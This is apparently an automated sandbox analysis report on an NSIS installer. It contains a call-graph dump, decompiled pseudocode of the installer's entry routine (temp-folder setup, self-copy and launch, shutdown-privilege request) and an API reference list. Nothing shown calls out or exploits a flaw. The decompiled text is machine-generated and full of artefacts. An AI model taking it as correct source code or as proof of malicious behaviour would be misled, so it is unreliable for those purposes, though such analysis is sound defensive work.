405975 GetDlgItem SendMessageW 4238->4242 4239->4240 4240->4229 4244 405af7 4240->4244 4245 405964 4241->4245 4246 405957 
ShowWindow 4241->4246 4242->4229 4243 40599c SendMessageW SendMessageW 4242->4243 4243->4229 4247 405b13 SendMessageW 4244->4247 4253 4045ff SendMessageW 4245->4253 4246->4245 4247->4247 4249 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4247->4249 4250 405b55 SendMessageW 4249->4250 4250->4250 4251 405b7e GlobalUnlock SetClipboardData CloseClipboard 4250->4251 4251->4229 4252->4213 4253->4242 4254->4216 4255 404e11 4256 404e21 4255->4256 4257 404e3d 4255->4257 4266 405cb2 GetDlgItemTextW 4256->4266 4259 404e70 4257->4259 4260 404e43 SHGetPathFromIDListW 4257->4260 4262 404e5a SendMessageW 4260->4262 4263 404e53 4260->4263 4261 404e2e SendMessageW 4261->4257 4262->4259 4265 40140b 2 API calls 4263->4265 4265->4262 4266->4261 4267 401491 4268 4056d0 24 API calls 4267->4268 4269 401498 4268->4269 4270 402891 4271 402898 4270->4271 4273 402ba9 4270->4273 4272 402d84 17 API calls 4271->4272 4274 40289f 4272->4274 4275 4028ae SetFilePointer 4274->4275 4275->4273 4276 4028be 4275->4276 4278 4065b5 wsprintfW 4276->4278 4278->4273 4279 401f12 4280 402da6 17 API calls 4279->4280 4281 401f18 4280->4281 4282 402da6 17 API calls 4281->4282 4283 401f21 4282->4283 4284 402da6 17 API calls 4283->4284 4285 401f2a 4284->4285 4286 402da6 17 API calls 4285->4286 4287 401f33 4286->4287 4288 401423 24 API calls 4287->4288 4289 401f3a 4288->4289 4296 405c94 ShellExecuteExW 4289->4296 4291 401f82 4292 406ae6 5 API calls 4291->4292 4294 40292e 4291->4294 4293 401f9f CloseHandle 4292->4293 4293->4294 4296->4291 4297 402f93 4298 402fa5 SetTimer 4297->4298 4299 402fbe 4297->4299 4298->4299 4300 40300c 4299->4300 4301 403012 MulDiv 4299->4301 4302 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4301->4302 4302->4300 4304 401d17 4305 402d84 17 API calls 4304->4305 4306 401d1d IsWindow 4305->4306 4307 401a20 4306->4307 4308 401b9b 4309 401ba8 4308->4309 4310 401bec 4308->4310 4313 401c31 4309->4313 4318 401bbf 4309->4318 4311 401bf1 4310->4311 4312 401c16 GlobalAlloc 4310->4312 
4323 40239d 4311->4323 4329 40666e lstrcpynW 4311->4329 4315 4066ab 17 API calls 4312->4315 4314 4066ab 17 API calls 4313->4314 4313->4323 4317 402397 4314->4317 4315->4313 4321 405cce MessageBoxIndirectW 4317->4321 4327 40666e lstrcpynW 4318->4327 4319 401c03 GlobalFree 4319->4323 4321->4323 4322 401bce 4328 40666e lstrcpynW 4322->4328 4325 401bdd 4330 40666e lstrcpynW 4325->4330 4327->4322 4328->4325 4329->4319 4330->4323 4331 40261c 4332 402da6 17 API calls 4331->4332 4333 402623 4332->4333 4336 40615e GetFileAttributesW CreateFileW 4333->4336 4335 40262f 4336->4335 4337 40149e 4338 4014ac PostQuitMessage 4337->4338 4339 40239d 4337->4339 4338->4339 4340 40259e 4350 402de6 4340->4350 4343 402d84 17 API calls 4344 4025b1 4343->4344 4345 4025d9 RegEnumValueW 4344->4345 4346 4025cd RegEnumKeyW 4344->4346 4348 40292e 4344->4348 4347 4025ee RegCloseKey 4345->4347 4346->4347 4347->4348 4351 402da6 17 API calls 4350->4351 4352 402dfd 4351->4352 4353 4064db RegOpenKeyExW 4352->4353 4354 4025a8 4353->4354 4354->4343 4355 4015a3 4356 402da6 17 API calls 4355->4356 4357 4015aa SetFileAttributesW 4356->4357 4358 4015bc 4357->4358 3288 401fa4 3289 402da6 17 API calls 3288->3289 3290 401faa 3289->3290 3291 4056d0 24 API calls 3290->3291 3292 401fb4 3291->3292 3303 405c51 CreateProcessW 3292->3303 3295 401fdd CloseHandle 3298 40292e 3295->3298 3299 401fcf 3300 401fd4 3299->3300 3301 401fdf 3299->3301 3311 4065b5 wsprintfW 3300->3311 3301->3295 3304 401fba 3303->3304 3305 405c84 CloseHandle 3303->3305 3304->3295 3304->3298 3306 406ae6 WaitForSingleObject 3304->3306 3305->3304 3307 406b00 3306->3307 3308 406b12 GetExitCodeProcess 3307->3308 3312 406a77 3307->3312 3308->3299 3311->3295 3313 406a94 PeekMessageW 3312->3313 3314 406aa4 WaitForSingleObject 3313->3314 3315 406a8a DispatchMessageW 3313->3315 3314->3307 3315->3313 4359 40202a 4360 402da6 17 API calls 4359->4360 4361 402031 4360->4361 4362 406a3b 5 API calls 4361->4362 4363 402040 4362->4363 4364 4020cc 4363->4364 4365 
40205c GlobalAlloc 4363->4365 4365->4364 4366 402070 4365->4366 4367 406a3b 5 API calls 4366->4367 4368 402077 4367->4368 4369 406a3b 5 API calls 4368->4369 4370 402081 4369->4370 4370->4364 4374 4065b5 wsprintfW 4370->4374 4372 4020ba 4375 4065b5 wsprintfW 4372->4375 4374->4372 4375->4364 4376 40252a 4377 402de6 17 API calls 4376->4377 4378 402534 4377->4378 4379 402da6 17 API calls 4378->4379 4380 40253d 4379->4380 4381 402548 RegQueryValueExW 4380->4381 4382 40292e 4380->4382 4383 402568 4381->4383 4386 40256e RegCloseKey 4381->4386 4383->4386 4387 4065b5 wsprintfW 4383->4387 4386->4382 4387->4386 4388 4021aa 4389 402da6 17 API calls 4388->4389 4390 4021b1 4389->4390 4391 402da6 17 API calls 4390->4391 4392 4021bb 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4021c5 4393->4394 4395 402da6 17 API calls 4394->4395 4396 4021cf 4395->4396 4397 402da6 17 API calls 4396->4397 4398 4021d9 4397->4398 4399 402218 CoCreateInstance 4398->4399 4400 402da6 17 API calls 4398->4400 4403 402237 4399->4403 4400->4399 4401 401423 24 API calls 4402 4022f6 4401->4402 4403->4401 4403->4402 3700 403c2b 3701 403c46 3700->3701 3702 403c3c CloseHandle 3700->3702 3703 403c50 CloseHandle 3701->3703 3704 403c5a 3701->3704 3702->3701 3703->3704 3709 403c88 3704->3709 3707 405d7a 67 API calls 3708 403c6b 3707->3708 3710 403c96 3709->3710 3711 403c5f 3710->3711 3712 403c9b FreeLibrary GlobalFree 3710->3712 3711->3707 3712->3711 3712->3712 4404 401a30 4405 402da6 17 API calls 4404->4405 4406 401a39 ExpandEnvironmentStringsW 4405->4406 4407 401a4d 4406->4407 4409 401a60 4406->4409 4408 401a52 lstrcmpW 4407->4408 4407->4409 4408->4409 4415 4023b2 4416 4023c0 4415->4416 4417 4023ba 4415->4417 4419 4023ce 4416->4419 4420 402da6 17 API calls 4416->4420 4418 402da6 17 API calls 4417->4418 4418->4416 4421 4023dc 4419->4421 4423 402da6 17 API calls 4419->4423 4420->4419 4422 402da6 17 API calls 4421->4422 4424 4023e5 WritePrivateProfileStringW 4422->4424 4423->4421 4425 402434 4426 402467 
4425->4426 4427 40243c 4425->4427 4429 402da6 17 API calls 4426->4429 4428 402de6 17 API calls 4427->4428 4430 402443 4428->4430 4431 40246e 4429->4431 4433 40247b 4430->4433 4434 402da6 17 API calls 4430->4434 4436 402e64 4431->4436 4435 402454 RegDeleteValueW RegCloseKey 4434->4435 4435->4433 4437 402e78 4436->4437 4439 402e71 4436->4439 4437->4439 4440 402ea9 4437->4440 4439->4433 4441 4064db RegOpenKeyExW 4440->4441 4442 402ed7 4441->4442 4443 402f81 4442->4443 4444 402ee7 RegEnumValueW 4442->4444 4448 402f0a 4442->4448 4443->4439 4445 402f71 RegCloseKey 4444->4445 4444->4448 4445->4443 4446 402f46 RegEnumKeyW 4447 402f4f RegCloseKey 4446->4447 4446->4448 4449 406a3b 5 API calls 4447->4449 4448->4445 4448->4446 4448->4447 4450 402ea9 6 API calls 4448->4450 4451 402f5f 4449->4451 4450->4448 4451->4443 4452 402f63 RegDeleteKeyW 4451->4452 4452->4443 4453 401735 4454 402da6 17 API calls 4453->4454 4455 40173c SearchPathW 4454->4455 4456 401757 4455->4456 4457 405037 GetDlgItem GetDlgItem 4458 405089 7 API calls 4457->4458 4469 4052ae 4457->4469 4459 405130 DeleteObject 4458->4459 4460 405123 SendMessageW 4458->4460 4461 405139 4459->4461 4460->4459 4463 405170 4461->4463 4464 4066ab 17 API calls 4461->4464 4462 405390 4466 40543c 4462->4466 4476 4053e9 SendMessageW 4462->4476 4500 4052a1 4462->4500 4465 4045ca 18 API calls 4463->4465 4470 405152 SendMessageW SendMessageW 4464->4470 4471 405184 4465->4471 4467 405446 SendMessageW 4466->4467 4468 40544e 4466->4468 4467->4468 4478 405460 ImageList_Destroy 4468->4478 4479 405467 4468->4479 4492 405477 4468->4492 4469->4462 4474 404f85 5 API calls 4469->4474 4491 40531d 4469->4491 4470->4461 4475 4045ca 18 API calls 4471->4475 4472 405382 SendMessageW 4472->4462 4473 404631 8 API calls 4477 40563d 4473->4477 4474->4491 4489 405195 4475->4489 4481 4053fe SendMessageW 4476->4481 4476->4500 4478->4479 4482 405470 GlobalFree 4479->4482 4479->4492 4480 4055f1 4485 405603 ShowWindow GetDlgItem ShowWindow 4480->4485 

Control-flow Graph for the function starting at 0x403646 (nodes marked Executed / Not Executed)
                                          C-Code - Quality: 78%
                                          			_entry_() {
                                          				WCHAR* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				int _v24;
                                          				int _v28;
                                          				struct _TOKEN_PRIVILEGES _v40;
                                          				signed char _v42;
                                          				int _v44;
                                          				signed int _v48;
                                          				intOrPtr _v278;
                                          				signed short _v310;
                                          				struct _OSVERSIONINFOW _v324;
                                          				struct _SHFILEINFOW _v1016;
                                          				intOrPtr* _t88;
                                          				intOrPtr* _t94;
                                          				void _t97;
                                          				void* _t116;
                                          				WCHAR* _t118;
                                          				signed int _t119;
                                          				intOrPtr* _t123;
                                          				void* _t137;
                                          				void* _t143;
                                          				void* _t148;
                                          				void* _t152;
                                          				void* _t157;
                                          				signed int _t167;
                                          				void* _t170;
                                          				void* _t175;
                                          				intOrPtr _t177;
                                          				intOrPtr _t178;
                                          				intOrPtr* _t179;
                                          				int _t188;
                                          				void* _t189;
                                          				void* _t198;
                                          				signed int _t204;
                                          				signed int _t209;
                                          				signed int _t214;
                                          				int* _t218;
                                          				signed int _t226;
                                          				signed int _t229;
                                          				CHAR* _t231;
                                          				signed int _t233;
                                          				WCHAR* _t234;
                                          
                                          				0x7b3000 = 0x20;
                                          				_t188 = 0;
                                          				_v24 = 0;
                                          				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                          				_v20 = 0;
                                          				SetErrorMode(0x8001); // executed
                                          				_v324.szCSDVersion = 0;
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v324.dwOSVersionInfoSize = 0x11c;
                                          				if(GetVersionExW( &_v324) == 0) {
                                          					_v324.dwOSVersionInfoSize = 0x114;
                                          					GetVersionExW( &_v324);
                                          					asm("sbb eax, eax");
                                          					_v42 = 4;
                                          					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                          				}
                                          				if(_v324.dwMajorVersion < 0xa) {
                                          					_v310 = _v310 & 0x00000000;
                                          				}
                                          				 *0x7a8b58 = _v324.dwBuildNumber;
                                          				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                          				if( *0x7a8b5e != 0x600) {
                                          					_t179 = E00406A3B(_t188);
                                          					if(_t179 != _t188) {
                                          						 *_t179(0xc00);
                                          					}
                                          				}
                                          				_t231 = "UXTHEME";
                                          				do {
                                          					E004069CB(_t231); // executed
                                          					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                          				} while ( *_t231 != 0);
                                          				E00406A3B(0xb);
                                          				 *0x7a8aa4 = E00406A3B(9);
                                          				_t88 = E00406A3B(7);
                                          				if(_t88 != _t188) {
                                          					_t88 =  *_t88(0x1e);
                                          					if(_t88 != 0) {
                                          						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
                                          					}
                                          				}
                                          				__imp__#17();
                                          				__imp__OleInitialize(_t188); // executed
                                          				 *0x7a8b60 = _t88;
                                          				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
                                          				E0040666E(0x7a7aa0, L"NSIS Error");
                                          				E0040666E(0x7b3000, GetCommandLineW());
                                          				_t94 = 0x7b3000;
                                          				_t233 = 0x22;
                                          				 *0x7a8aa0 = 0x400000;
                                          				if( *0x7b3000 == _t233) {
                                          					_t94 = 0x7b3002;
                                          				}
                                          				_t198 = CharNextW(E00405F6A(_t94, 0x7b3000));
                                          				_v16 = _t198;
                                          				while(1) {
                                          					_t97 =  *_t198;
                                          					_t251 = _t97 - _t188;
                                          					if(_t97 == _t188) {
                                          						break;
                                          					}
                                          					_t209 = 0x20;
                                          					__eflags = _t97 - _t209;
                                          					if(_t97 != _t209) {
                                          						L17:
                                          						__eflags =  *_t198 - _t233;
                                          						_v12 = _t209;
                                          						if( *_t198 == _t233) {
                                          							_v12 = _t233;
                                          							_t198 = _t198 + 2;
                                          							__eflags = _t198;
                                          						}
                                          						__eflags =  *_t198 - 0x2f;
                                          						if( *_t198 != 0x2f) {
                                          							L32:
                                          							_t198 = E00405F6A(_t198, _v12);
                                          							__eflags =  *_t198 - _t233;
                                          							if(__eflags == 0) {
                                          								_t198 = _t198 + 2;
                                          								__eflags = _t198;
                                          							}
                                          							continue;
                                          						} else {
                                          							_t198 = _t198 + 2;
                                          							__eflags =  *_t198 - 0x53;
                                          							if( *_t198 != 0x53) {
                                          								L24:
                                          								asm("cdq");
                                          								asm("cdq");
                                          								_t214 = L"NCRC" & 0x0000ffff;
                                          								asm("cdq");
                                          								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                          								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                          								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                          									L29:
                                          									asm("cdq");
                                          									asm("cdq");
                                          									_t209 = L" /D=" & 0x0000ffff;
                                          									asm("cdq");
                                          									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                          									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                          									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                          										L31:
                                          										_t233 = 0x22;
                                          										goto L32;
                                          									}
                                          									__eflags =  *_t198 - _t229;
                                          									if( *_t198 == _t229) {
                                          										 *(_t198 - 4) = _t188;
                                          										__eflags = _t198;
                                          										E0040666E(0x7b3800, _t198);
                                          										L37:
                                          										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                          										GetTempPathW(0x400, _t234);
                                          										_t116 = E00403615(_t198, _t251);
                                          										_t252 = _t116;
                                          										if(_t116 != 0) {
                                          											L40:
                                          											DeleteFileW(L"1033"); // executed
                                          											_t118 = E004030D0(_t254, _v20); // executed
                                          											_v8 = _t118;
                                          											if(_t118 != _t188) {
                                          												L68:
                                          												ExitProcess(); // executed
                                          												__imp__OleUninitialize(); // executed
                                          												if(_v8 == _t188) {
                                          													if( *0x7a8b34 == _t188) {
                                          														L77:
                                          														_t119 =  *0x7a8b4c;
                                          														if(_t119 != 0xffffffff) {
                                          															_v24 = _t119;
                                          														}
                                          														ExitProcess(_v24);
                                          													}
                                          													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                          														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                          														_v40.PrivilegeCount = 1;
                                          														_v28 = 2;
                                          														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                          													}
                                          													_t123 = E00406A3B(4);
                                          													if(_t123 == _t188) {
                                          														L75:
                                          														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                          															goto L77;
                                          														}
                                          														goto L76;
                                          													} else {
                                          														_push(0x80040002);
                                          														_push(0x25);
                                          														_push(_t188);
                                          														_push(_t188);
                                          														_push(_t188);
                                          														if( *_t123() == 0) {
                                          															L76:
                                          															E0040140B(9);
                                          															goto L77;
                                          														}
                                          														goto L75;
                                          													}
                                          												}
                                          												E00405CCE(_v8, 0x200010);
                                          												ExitProcess(2);
                                          											}
                                          											if( *0x7a8abc == _t188) {
                                          												L51:
                                          												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
                                          												_v24 = E00403D1D(_t264);
                                          												goto L68;
                                          											}
                                          											_t218 = E00405F6A(0x7b3000, _t188);
                                          											if(_t218 < 0x7b3000) {
                                          												L48:
                                          												_t263 = _t218 - 0x7b3000;
                                          												_v8 = L"Error launching installer";
                                          												if(_t218 < 0x7b3000) {
                                          													_t189 = E00405C39(__eflags);
                                          													lstrcatW(_t234, L"~nsu");
                                          													__eflags = _t189;
                                          													if(_t189 != 0) {
                                          														lstrcatW(_t234, "A");
                                          													}
                                          													lstrcatW(_t234, L".tmp");
                                          													_t137 = lstrcmpiW(_t234, 0x7b4800);
                                          													__eflags = _t137;
                                          													if(_t137 == 0) {
                                          														L67:
                                          														_t188 = 0;
                                          														__eflags = 0;
                                          														goto L68;
                                          													} else {
                                          														__eflags = _t189;
                                          														_push(_t234);
                                          														if(_t189 == 0) {
                                          															E00405C1C();
                                          														} else {
                                          															E00405B9F();
                                          														}
                                          														SetCurrentDirectoryW(_t234);
                                          														__eflags =  *0x7b3800;
                                          														if( *0x7b3800 == 0) {
                                          															E0040666E(0x7b3800, 0x7b4800);
                                          														}
                                          														E0040666E(0x7a9000, _v16);
                                          														_t201 = "A" & 0x0000ffff;
                                          														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                          														__eflags = _t143;
                                          														_v12 = 0x1a;
                                          														 *0x7a9800 = _t143;
                                          														do {
                                          															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
                                          															DeleteFileW(0x79f748);
                                          															__eflags = _v8;
                                          															if(_v8 != 0) {
                                          																_t148 = CopyFileW(0x7b6800, 0x79f748, 1);
                                          																__eflags = _t148;
                                          																if(_t148 != 0) {
                                          																	E0040642E(_t201, 0x79f748, 0);
                                          																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
                                          																	_t152 = E00405C51(0x79f748);
                                          																	__eflags = _t152;
                                          																	if(_t152 != 0) {
                                          																		CloseHandle(_t152);
                                          																		_v8 = 0;
                                          																	}
                                          																}
                                          															}
                                          															 *0x7a9800 =  *0x7a9800 + 1;
                                          															_t61 =  &_v12;
                                          															 *_t61 = _v12 - 1;
                                          															__eflags =  *_t61;
                                          														} while ( *_t61 != 0);
                                          														E0040642E(_t201, _t234, 0);
                                          														goto L67;
                                          													}
                                          												}
                                          												 *_t218 = _t188;
                                          												_t221 =  &(_t218[2]);
                                          												_t157 = E00406045(_t263,  &(_t218[2]));
                                          												_t264 = _t157;
                                          												if(_t157 == 0) {
                                          													goto L68;
                                          												}
                                          												E0040666E(0x7b3800, _t221);
                                          												E0040666E(0x7b4000, _t221);
                                          												_v8 = _t188;
                                          												goto L51;
                                          											}
                                          											asm("cdq");
                                          											asm("cdq");
                                          											asm("cdq");
                                          											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                          											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                          											while( *_t218 != _t204 || _t218[1] != _t167) {
                                          												_t218 = _t218;
                                          												if(_t218 >= 0x7b3000) {
                                          													continue;
                                          												}
                                          												break;
                                          											}
                                          											_t188 = 0;
                                          											goto L48;
                                          										}
                                          										GetWindowsDirectoryW(_t234, 0x3fb);
                                          										lstrcatW(_t234, L"\\Temp");
                                          										_t170 = E00403615(_t198, _t252);
                                          										_t253 = _t170;
                                          										if(_t170 != 0) {
                                          											goto L40;
                                          										}
                                          										GetTempPathW(0x3fc, _t234);
                                          										lstrcatW(_t234, L"Low");
                                          										SetEnvironmentVariableW(L"TEMP", _t234);
                                          										SetEnvironmentVariableW(L"TMP", _t234);
                                          										_t175 = E00403615(_t198, _t253);
                                          										_t254 = _t175;
                                          										if(_t175 == 0) {
                                          											goto L68;
                                          										}
                                          										goto L40;
                                          									}
                                          									goto L31;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                          								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                          									goto L29;
                                          								}
                                          								_t177 =  *((intOrPtr*)(_t198 + 8));
                                          								__eflags = _t177 - 0x20;
                                          								if(_t177 == 0x20) {
                                          									L28:
                                          									_t36 =  &_v20;
                                          									 *_t36 = _v20 | 0x00000004;
                                          									__eflags =  *_t36;
                                          									goto L29;
                                          								}
                                          								__eflags = _t177 - _t188;
                                          								if(_t177 != _t188) {
                                          									goto L29;
                                          								}
                                          								goto L28;
                                          							}
                                          							_t178 =  *((intOrPtr*)(_t198 + 2));
                                          							__eflags = _t178 - _t209;
                                          							if(_t178 == _t209) {
                                          								L23:
                                          								 *0x7a8b40 = 1;
                                          								goto L24;
                                          							}
                                          							__eflags = _t178 - _t188;
                                          							if(_t178 != _t188) {
                                          								goto L24;
                                          							}
                                          							goto L23;
                                          						}
                                          					} else {
                                          						goto L16;
                                          					}
                                          					do {
                                          						L16:
                                          						_t198 = _t198 + 2;
                                          						__eflags =  *_t198 - _t209;
                                          					} while ( *_t198 == _t209);
                                          					goto L17;
                                          				}
                                          				goto L37;
                                          			}
                                          0x004038ea
                                          0x004038ed
                                          0x004038f0
                                          0x004038f0
                                          0x004038f0
                                          0x00000000
                                          0x00403825
                                          0x00403826
                                          0x00403827
                                          0x0040382b
                                          0x00403845
                                          0x0040384c
                                          0x0040385f
                                          0x00403860
                                          0x00403875
                                          0x0040387a
                                          0x0040387c
                                          0x0040387e
                                          0x0040389a
                                          0x004038a1
                                          0x004038b4
                                          0x004038b5
                                          0x004038ca
                                          0x004038d0
                                          0x004038d2
                                          0x004038d4
                                          0x004038dc
                                          0x004038de
                                          0x00000000
                                          0x004038de
                                          0x004038d8
                                          0x004038da
                                          0x004038ff
                                          0x00403903
                                          0x0040390c
                                          0x00403911
                                          0x00403917
                                          0x00403922
                                          0x00403924
                                          0x00403929
                                          0x0040392b
                                          0x00403983
                                          0x00403988
                                          0x00403991
                                          0x00403998
                                          0x0040399b
                                          0x00403b72
                                          0x00403b72
                                          0x00403b77
                                          0x00403b80
                                          0x00403b9d
                                          0x00403c15
                                          0x00403c15
                                          0x00403c1d
                                          0x00403c1f
                                          0x00403c1f
                                          0x00403c25
                                          0x00403c25
                                          0x00403bb4
                                          0x00403bc0
                                          0x00403bd1
                                          0x00403bd8
                                          0x00403bdf
                                          0x00403bdf
                                          0x00403be7
                                          0x00403bf3
                                          0x00403c01
                                          0x00403c0c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403bf5
                                          0x00403bf5
                                          0x00403bf6
                                          0x00403bf8
                                          0x00403bf9
                                          0x00403bfa
                                          0x00403bff
                                          0x00403c0e
                                          0x00403c10
                                          0x00000000
                                          0x00403c10
                                          0x00000000
                                          0x00403bff
                                          0x00403bf3
                                          0x00403b8a
                                          0x00403b91
                                          0x00403b91
                                          0x004039a7
                                          0x00403a4e
                                          0x00403a4e
                                          0x00403a5a
                                          0x00000000
                                          0x00403a5a
                                          0x004039b8
                                          0x004039c0
                                          0x00403a12
                                          0x00403a12
                                          0x00403a18
                                          0x00403a1f
                                          0x00403a6d
                                          0x00403a6f
                                          0x00403a74
                                          0x00403a76
                                          0x00403a7e
                                          0x00403a7e
                                          0x00403a89
                                          0x00403a95
                                          0x00403a9b
                                          0x00403a9d
                                          0x00403b70
                                          0x00403b70
                                          0x00403b70
                                          0x00000000
                                          0x00403aa3
                                          0x00403aa3
                                          0x00403aa5
                                          0x00403aa6
                                          0x00403aaf
                                          0x00403aa8
                                          0x00403aa8
                                          0x00403aa8
                                          0x00403ab5
                                          0x00403abd
                                          0x00403ac4
                                          0x00403acc
                                          0x00403acc
                                          0x00403ad9
                                          0x00403ae5
                                          0x00403aef
                                          0x00403aef
                                          0x00403af1
                                          0x00403af8
                                          0x00403b02
                                          0x00403b0e
                                          0x00403b14
                                          0x00403b1a
                                          0x00403b1d
                                          0x00403b27
                                          0x00403b2d
                                          0x00403b2f
                                          0x00403b33
                                          0x00403b44
                                          0x00403b4a
                                          0x00403b4f
                                          0x00403b51
                                          0x00403b54
                                          0x00403b5a
                                          0x00403b5a
                                          0x00403b51
                                          0x00403b2f
                                          0x00403b5d
                                          0x00403b64
                                          0x00403b64
                                          0x00403b64
                                          0x00403b64
                                          0x00403b6b
                                          0x00000000
                                          0x00403b6b
                                          0x00403a9d
                                          0x00403a21
                                          0x00403a24
                                          0x00403a28
                                          0x00403a2d
                                          0x00403a2f
                                          0x00000000
                                          0x00000000
                                          0x00403a3b
                                          0x00403a46
                                          0x00403a4b
                                          0x00000000
                                          0x00403a4b
                                          0x004039c9
                                          0x004039e1
                                          0x004039f2
                                          0x004039f3
                                          0x004039f7
                                          0x004039f9
                                          0x00403a07
                                          0x00403a0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403a0e
                                          0x00403a10
                                          0x00000000
                                          0x00403a10
                                          0x00403933
                                          0x0040393f
                                          0x00403944
                                          0x00403949
                                          0x0040394b
                                          0x00000000
                                          0x00000000
                                          0x00403953
                                          0x0040395b
                                          0x0040396c
                                          0x00403974
                                          0x00403976
                                          0x0040397b
                                          0x0040397d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040397d
                                          0x00000000
                                          0x004038da
                                          0x00403883
                                          0x00403885
                                          0x00000000
                                          0x00000000
                                          0x00403887
                                          0x0040388b
                                          0x0040388f
                                          0x00403896
                                          0x00403896
                                          0x00403896
                                          0x00403896
                                          0x00000000
                                          0x00403896
                                          0x00403891
                                          0x00403894
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403894
                                          0x0040382d
                                          0x00403831
                                          0x00403834
                                          0x0040383b
                                          0x0040383b
                                          0x00000000
                                          0x0040383b
                                          0x00403836
                                          0x00403839
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403839
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403807
                                          0x00403807
                                          0x00403808
                                          0x00403809
                                          0x00403809
                                          0x00000000
                                          0x00403807
                                          0x00000000

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                                          • GetVersionExW.KERNEL32(?), ref: 00403692
                                          • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                                          • OleInitialize.OLE32(00000000), ref: 00403783
                                          • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                                          • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                                          • CharNextW.USER32(00000000), ref: 004037EF
                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403922
                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                                          • lstrcatW.KERNEL32 ref: 0040393F
                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403953
                                          • lstrcatW.KERNEL32 ref: 0040395B
                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                                          • DeleteFileW.KERNELBASE(1033), ref: 00403988
                                          • lstrcatW.KERNEL32 ref: 00403A6F
                                          • lstrcatW.KERNEL32 ref: 00403A7E
                                            • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                          • lstrcatW.KERNEL32 ref: 00403A89
                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403A95
                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                                          • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                                          • CopyFileW.KERNEL32 ref: 00403B27
                                          • CloseHandle.KERNEL32(00000000), ref: 00403B54
                                          • ExitProcess.KERNELBASE(?), ref: 00403B72
                                          • OleUninitialize.OLE32 ref: 00403B77
                                          • ExitProcess.KERNEL32 ref: 00403B91
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
